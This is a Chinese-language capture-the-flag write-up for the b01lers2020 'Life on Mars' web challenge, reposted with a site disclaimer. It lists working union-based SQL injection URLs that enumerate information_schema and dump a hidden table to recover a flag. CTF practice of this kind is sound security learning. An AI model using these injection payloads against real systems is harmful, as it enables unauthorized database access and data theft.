标签:Life code b01lers2020 olympus mons% Mars query 202 schema
[b01lers2020]Life on Mars WriteUp
知识点
- sql注入
- 难点在于发现这是个sql注入
题解
-
长记性了,我先扫一遍看看有没有什么文件备份,泄露之类的。发现没有。
-
抓个包看看,发现莫名参数,最先想到的就是模板注入吧,然后发现是sql注入
-
有两个回显,啥也没过滤,就是sql注入那一套,干就行了
-
/query?search=olympus_mons%20union%20select%202,database()&{}&_=1649851408180
//aliens
-
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='aliens'
//"amazonis_planitia,arabia_terra,chryse_planitia,hellas_basin,hesperia_planum,noachis_terra,olympus_mons,tharsis_rise,utopia_basin"
表名好多啊
-
一个一个试吧,MD,都没有,靠。
-
爆其他的数据库
/query?search=olympus_mons%20union%20select%202,group_concat(schema_name)%20from%20information_schema.schemata
//information_schema,alien_code,aliens
-
爆alien_code的表
/query?search=olympus_mons%20union%20select%202,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='alien_code'
//code
-
/query?search=olympus_mons%20union%20select%202,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='code'
//id,code
-
/query?search=olympus_mons%20union%20select%202,group_concat(id,code)%20from%20alien_code.code
//0flag{.。。。。。。。。。。。。。。。。。。}
标签:Life,code,b01lers2020,olympus,mons%,Mars,query,202,schema 来源: https://www.cnblogs.com/Q-and-K/p/16142031.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。